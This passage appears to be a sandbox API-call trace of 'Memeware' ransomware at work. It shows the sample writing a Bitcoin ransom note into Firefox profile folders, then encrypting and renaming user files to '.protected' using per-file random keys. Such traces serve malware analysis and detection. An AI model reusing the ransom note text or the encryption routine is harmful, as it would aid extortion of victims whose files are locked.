payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.654] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0090.655] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.655] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.655] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.655] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0090.655] CloseHandle (hObject=0x15c) returned 1 [0090.655] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0090.655] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0090.655] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\RESTORE_FILES.txt") returned 139 [0090.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.666] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.666] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0090.668] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.668] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0090.668] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.668] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0090.668] CloseHandle (hObject=0x158) returned 1 [0090.669] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.669] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.669] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\RESTORE_FILES.txt") returned 119 [0090.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.670] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.670] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.671] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.671] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.671] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.671] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.671] CloseHandle (hObject=0x154) returned 1 [0090.672] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Windows") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Program Files") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Program Files (x86)") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="$Recycle.bin") returned 1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="System Volume Information") returned -1 [0090.672] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.672] StrStrIW (lpFirst="key3.db", lpSrch=".protected") returned 0x0 [0090.672] lstrcmpW (lpString1="key3.db", lpString2="RESTORE_FILES.txt") returned -1 [0090.672] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.672] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".txt") returned 0x0 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".rar") returned 0x0 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".zip") returned 0x0 [0090.673] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.690] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.690] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.691] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.691] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.691] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.691] CloseHandle (hObject=0x154) returned 1 [0090.691] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.protected") returned 109 [0090.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.protected")) returned 1 [0090.692] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Windows") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Program Files") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Program Files (x86)") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="$Recycle.bin") returned 1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="System Volume Information") returned -1 [0090.692] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.692] StrStrIW (lpFirst="localstore.rdf", lpSrch=".protected") returned 0x0 [0090.692] lstrcmpW (lpString1="localstore.rdf", lpString2="RESTORE_FILES.txt") returned -1 [0090.692] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.692] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".txt") returned 0x0 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".rar") returned 0x0 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".zip") returned 0x0 [0090.694] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x501, lpOverlapped=0x0) returned 1 [0090.728] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffaff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x501, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x501, lpOverlapped=0x0) returned 1 [0090.728] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.728] CloseHandle (hObject=0x154) returned 1 [0090.728] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.protected") returned 116 [0090.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.protected")) returned 1 [0090.729] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="Windows") returned -1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="Program Files") returned -1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="Program Files (x86)") returned -1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="$Recycle.bin") returned 1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="System Volume Information") returned -1 [0090.729] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.729] StrStrIW (lpFirst="marionette.log", lpSrch=".protected") returned 0x0 [0090.729] lstrcmpW (lpString1="marionette.log", lpString2="RESTORE_FILES.txt") returned -1 [0090.729] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.730] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".txt") returned 0x0 [0090.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".rar") returned 0x0 [0090.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".zip") returned 0x0 [0090.730] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x39, lpOverlapped=0x0) returned 1 [0090.731] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x39, lpOverlapped=0x0) returned 1 [0090.731] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.731] CloseHandle (hObject=0x154) returned 1 [0090.731] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.protected") returned 116 [0090.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.protected")) returned 1 [0090.732] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Windows") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Program Files") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Program Files (x86)") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="$Recycle.bin") returned 1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="System Volume Information") returned -1 [0090.732] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 